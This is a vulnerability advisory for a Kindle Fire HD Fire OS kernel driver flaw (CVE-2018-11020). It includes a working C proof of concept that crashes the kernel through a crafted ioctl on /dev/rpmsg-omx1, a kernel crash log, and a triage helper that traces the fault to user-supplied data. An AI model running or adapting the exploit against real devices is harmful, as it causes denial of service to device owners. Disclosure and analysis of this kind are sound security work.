(CVE-2018-11020) Amazon Kindle Fire HD (3rd) Fire OS kernel component security vulnerability.docx
I. Vulnerability Overview

The kernel module omap/drivers/rpmsg/rpmsg_omx.c in the kernel component of Amazon Kindle Fire HD (3rd) Fire OS 4.5.5.3 allows an attacker to inject a crafted argument through the argument of an ioctl on the device file /dev/rpmsg-omx1 with command 3221772291, causing a kernel crash. To explore this vulnerability, one must open the device file /dev/rpmsg-omx1 and make an ioctl system call on it with command 3221772291 and a crafted payload as the third argument.

II. Affected Versions

Fire OS 4.5.5.3

III. Reproduction

PoC

    /*
     * This is poc of Kindle Fire HD 3rd
     * A bug in the ioctl interface of device file /dev/rpmsg-omx1 causes the system crash via IOCTL 3221772291.
     * Related buggy struct name is gcicommit.
     * This Poc should run with permission to do ioctl on /dev/rpmsg-omx1.
     * The following is kmsg of kernel crash information:
     */
    #include <stdio.h>
    #include <stdlib.h>     /* system() */
    #include <unistd.h>     /* close() */
    #include <fcntl.h>
    #include <errno.h>
    #include <sys/ioctl.h>

    static const char *driver = "/dev/rpmsg-omx1";
    static const unsigned int command = 3221772291U;

    int main(int argc, char **argv, char **env)
    {
        /* Arbitrary words passed as the ioctl argument. */
        unsigned int payload[] = { 0xb5d18de2, 0xf6e48a17, 0x9179c429, 0x89a32e03 };
        int fd = 0;

        fd = open(driver, O_RDWR);
        if (fd < 0) {
            printf("Failed to open %s, with errno %d\n", driver, errno);
            system("echo 1 > /data/local/tmp/log");
            return -1;
        }

        printf("Try open %s with command 0x%x.\n", driver, command);
        printf("System will crash and reboot.\n");

        if (ioctl(fd, command, &payload) < 0) {
            printf("Allocation of structs failed, %d\n", errno);
            system("echo 2 > /data/local/tmp/log");
            return -1;
        }

        close(fd);
        return 0;
    }

Crash log

    [  146.290710] Unable to handle kernel paging request at virtual address b5d18de6
    [  146.299438] pgd = d72dc000
    [  146.302795] [b5d18de6] *pgd=00000000
    [  146.307281] Internal error: Oops: 5 [#1] PREEMPT SMP ARM
    [  146.313232] Modules linked in: omaplfb(O) pvrsrvkm(O) pvr_logger(O)
    [  146.320983] CPU: 0    Tainted: G           O  (3.4.83-gd2afc0bae69 #1)
    [  146.328308] PC is at ion_free+0xc/0xb4
    [  146.332672] LR is at rpmsg_omx_ioctl+0x2cc/0x598
    [  146.337890] pc : [<c02e8540>]    lr : [<c048a120>]    psr: 60000013
    [  146.337890] sp : c35b5e60  ip : c35b5e80  fp : c35b5e7c
    [  146.350860] r10: c35b5ea8  r9 : de88c4d8  r8 : c35b4000
    [  146.356872] r7 : dd32b580  r6 : 00000003  r5 : d71d5880  r4 : be92f500
    [  146.364135] r3 : d71d58ec  r2 : d71d58ec  r1 : b5d18de2  r0 : d7aaaa
    [  146.371551] Flags: nZCv  IRQs on  FIQs on  Mode SVC_32  ISA ARM  Segment user
    [  146.379516] Control: 10c5387d  Table: 972dc04a  DAC: 00000015
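
Added example (not part of the original document or its PoC): a small C triage helper that decodes the ioctl command with the generic Linux ioctl bit layout and checks whether the faulting address and r1 in the oops come from the user-supplied payload. The function names and the 64-byte offset window are assumptions made for illustration; the constants are copied from the PoC and crash log above.

```c
#include <stdint.h>
#include <stdio.h>

/* Constants copied from the PoC and the oops on this page. */
static const uint32_t POC_CMD = 3221772291u;            /* ioctl command */
static const uint32_t POC_PAYLOAD[4] = { 0xb5d18de2u, 0xf6e48a17u,
                                         0x9179c429u, 0x89a32e03u };
static const uint32_t OOPS_FAULT_ADDR = 0xb5d18de6u;    /* "paging request at" */
static const uint32_t OOPS_R1 = 0xb5d18de2u;            /* r1 at crash time */

/* Generic Linux ioctl encoding (asm-generic/ioctl.h, used on ARM):
 * bits 0-7 nr, 8-15 type ("magic"), 16-29 argument size, 30-31 direction. */
struct ioc_fields { unsigned dir, size, type, nr; };

struct ioc_fields ioc_decode(uint32_t cmd)
{
    struct ioc_fields f;
    f.nr   = cmd & 0xffu;
    f.type = (cmd >> 8) & 0xffu;
    f.size = (cmd >> 16) & 0x3fffu;
    f.dir  = (cmd >> 30) & 0x3u;   /* 1 = write, 2 = read, 3 = both */
    return f;
}

/* Index of the user-supplied word that `addr` equals or sits just above
 * (addr - word <= max_off), or -1 if no word matches. Hypothetical helper. */
int derived_from(uint32_t addr, const uint32_t *words, int n, uint32_t max_off)
{
    for (int i = 0; i < n; i++)
        if ((uint32_t)(addr - words[i]) <= max_off)
            return i;
    return -1;
}

int main(void)
{
    struct ioc_fields f = ioc_decode(POC_CMD);
    printf("cmd 0x%08x: dir=%u size=%u type='%c' nr=%u\n",
           (unsigned)POC_CMD, f.dir, f.size, (int)f.type, f.nr);

    int i = derived_from(OOPS_FAULT_ADDR, POC_PAYLOAD, 4, 64);
    if (i >= 0)
        printf("fault address = payload[%d] + %u: user data used as a pointer\n",
               i, (unsigned)(OOPS_FAULT_ADDR - POC_PAYLOAD[i]));
    i = derived_from(OOPS_R1, POC_PAYLOAD, 4, 64);
    if (i >= 0)
        printf("r1 = payload[%d] + %u\n", i, (unsigned)(OOPS_R1 - POC_PAYLOAD[i]));
    return 0;
}
```

The command decodes to a read/write ioctl with magic 'X', number 3 and a declared 8-byte argument, and the faulting address is the first payload word plus 4 with PC in ion_free, so the crash is a kernel dereference of a value taken directly from user space. A handler receiving such a value needs to check it against the objects it actually issued before dereferencing it.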